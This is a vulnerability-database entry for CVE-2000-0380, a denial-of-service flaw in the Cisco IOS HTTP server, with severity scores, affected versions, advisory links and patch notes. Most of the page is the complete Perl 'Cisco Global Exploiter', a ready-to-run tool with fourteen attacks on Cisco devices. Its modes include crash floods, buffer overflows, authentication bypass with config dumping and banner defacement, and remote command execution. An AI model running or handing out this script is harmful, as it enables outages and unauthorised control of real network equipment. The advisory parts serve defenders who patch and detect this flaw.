CVE-2000-0380
CVSS 7.1
Published: 2000-04-26 00:00:00
Last revised: 2008-09-10 00:00:00

[Original] The IOS HTTP service in Cisco routers and switches running IOS 11.1 through 12.1 allows remote attackers to cause a denial of service by requesting a URL that contains a %% string.


[CNNVD] Cisco IOS web management interface "%%" string remote denial-of-service vulnerability (CNNVD-200004-074)

        
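        Cisco IOS is the operating system that runs widely on the various network devices made by Cisco Systems.
        The HTTP management interface of IOS on many Cisco routers has an implementation flaw that a remote attacker may use to cause a denial of service on the device.
        If such a router has a web server enabled for managing the router or for other operations (usually by adding a command such as "ip http server"), an attacker only needs to submit the URL http://victim.router/%% to crash the router. Some routers reboot automatically; others must be manually powered off and restarted before they resume normal operation.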
        

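- CVSS (base score)

CVSS score: 7.1 [HIGH]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: COMPLETE [may cause a complete shutdown of the system]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]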

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

cpe:/o:cisco:ios:12.0%288%29  Cisco IOS 12.0(8)
cpe:/o:cisco:ios:11.3  Cisco IOS 11.3
cpe:/o:cisco:ios:12.0%282%29xd  Cisco IOS 12.0.2 XD
cpe:/o:cisco:ios:11.3t  Cisco IOS 11.3T
cpe:/o:cisco:ios:12.0s  Cisco IOS 12.0S
cpe:/o:cisco:ios:11.2%284%29f1  Cisco IOS 11.2.4 F1
cpe:/o:cisco:ios:12.0  Cisco IOS 12.0
cpe:/o:cisco:ios:12.0%282%29xc  Cisco IOS 12.0.2 XC
cpe:/o:cisco:ios:11.2%289%29xa  Cisco IOS 11.2.9 XA
cpe:/o:cisco:ios:12.0%283%29t2  Cisco IOS 12.0.3 T2
cpe:/o:cisco:ios:12.0%284%29t  Cisco IOS 12.0.4 T
cpe:/o:cisco:ios:12.0%282%29xf  Cisco IOS 12.0.2 XF
cpe:/o:cisco:ios:12.0%282%29  Cisco IOS 12.0.2
cpe:/o:cisco:ios:11.2%289%29p  Cisco IOS 11.2.9 P
cpe:/o:cisco:ios:11.3%281%29t  Cisco IOS 11.3.1 T
cpe:/o:cisco:ios:11.3%281%29ed  Cisco IOS 11.3.1 ED
cpe:/o:cisco:ios:11.2%2810%29bc  Cisco IOS 11.2.10 BC
cpe:/o:cisco:ios:12.0%284%29s  Cisco IOS 12.0.4 S
cpe:/o:cisco:ios:12.0%284%29  Cisco IOS 12.0.4
cpe:/o:cisco:ios:11.2p  Cisco IOS 11.2P
cpe:/o:cisco:ios:12.0%281%29xe  Cisco IOS 12.0.1 XE
cpe:/o:cisco:ios:12.0%286%29  Cisco IOS 12.0.6
cpe:/o:cisco:ios:11.2%288%29  Cisco IOS 11.2.8
cpe:/o:cisco:ios:12.0%287%29t  Cisco IOS 12.0(7)T
cpe:/o:cisco:ios:12.0%281%29w  Cisco IOS 12.0.1 W
cpe:/o:cisco:ios:11.2%288%29p  Cisco IOS 11.2.8 P
cpe:/o:cisco:ios:11.2  Cisco IOS 11.2
cpe:/o:cisco:ios:12.0%285%29t1  Cisco IOS 12.0(5)T1
cpe:/o:cisco:ios:12.0%285%29  Cisco IOS 12.0.5
cpe:/o:cisco:ios:11.2%2817%29  Cisco IOS 11.2(17)
cpe:/o:cisco:ios:11.1  Cisco IOS 11.1
cpe:/o:cisco:ios:12.0%281%29xb  Cisco IOS 12.0.1 XB
cpe:/o:cisco:ios:11.2%2810%29  Cisco IOS 11.2.10
cpe:/o:cisco:ios:12.0%281%29xa3  Cisco IOS 12.0.1 XA3
cpe:/o:cisco:ios:11.3%281%29  Cisco IOS 11.3.1
cpe:/o:cisco:ios:12.0t  Cisco IOS 12.0T
cpe:/o:cisco:ios:12.0%282%29xg  Cisco IOS 12.0.2 XG
cpe:/o:cisco:ios:12.0db  Cisco IOS 12.0DB
cpe:/o:cisco:ios:12.0%289%29s  Cisco IOS 12.0(9)S

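- OVAL (technical details for detection)

oval:org.mitre.oval:def:5938  Cisco IOS HTTP Configuration Interface Denial of Service Vulnerability
* OVAL describes in detail how to detect this vulnerability; the related OVAL definition contains more technical details for detecting it.

- Official database links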

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0380
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0380
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-074
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1154
(UNKNOWN)  BID  1154
http://www.osvdb.org/1302
(UNKNOWN)  OSVDB  1302
http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
(UNKNOWN)  CISCO  20000514 Cisco IOS HTTP Server Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2000-04/0261.html
(UNKNOWN)  BUGTRAQ  20000426 Cisco HTTP possible bug:

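- Vulnerability information

Cisco IOS web management interface "%%" string remote denial-of-service vulnerability
High risk  Input validation
2000-04-26 00:00:00 2005-07-27 00:00:00
Remote
        
        Cisco IOS is the operating system that runs widely on the various network devices made by Cisco Systems.
        The HTTP management interface of IOS on many Cisco routers has an implementation flaw that a remote attacker may use to cause a denial of service on the device.
        If such a router has a web server enabled for managing the router or for other operations (usually by adding a command such as "ip http server"), an attacker only needs to submit the URL http://victim.router/%% to crash the router. Some routers reboot automatically; others must be manually powered off and restarted before they resume normal operation.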
        

- Advisories and patches

        Vendor patch:
        Cisco
        -----
        Cisco has released a security advisory (CI-00.04) and corresponding patches for this issue:
        CI-00.04: Cisco IOS HTTP Server Vulnerability
        Link:
        Patch download:
        
        http://www.cisco.com/

- Vulnerability information (19882)

Cisco IOS 11.x/12.x HTTP %% Vulnerability (EDBID:19882)
hardware remote
2000-04-26 Verified
0 Keith Woodworth
N/A
source: http://www.securityfocus.com/bid/1154/info

A denial of service attack exists in versions of Cisco IOS running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information, a user can cause the router to crash.

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

		

- Vulnerability information

1302
Cisco IOS HTTP Service %% GET Request Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- Vulnerability description

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when an HTTP GET request for the string %% is sent to the router, and will result in loss of availability for the platform.

- Timeline

2000-05-14 2000-04-26
Unknown Unknown

- Solution

Upgrade to the version indicated by the Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
